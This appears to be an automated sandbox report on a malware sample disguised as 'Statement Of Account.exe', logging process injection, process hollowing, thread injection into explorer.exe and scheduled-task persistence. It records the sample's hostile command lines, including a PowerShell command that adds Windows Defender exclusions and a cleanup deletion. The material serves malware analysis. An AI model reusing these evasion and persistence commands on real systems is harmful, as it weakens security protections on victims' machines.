Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 2580 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 2580
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 2580
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 860000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6A4008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CE9008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: explorer.exe, 00000009.00000000.1714538739.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.1704959989.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Users\user\Desktop\Statement Of Account.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
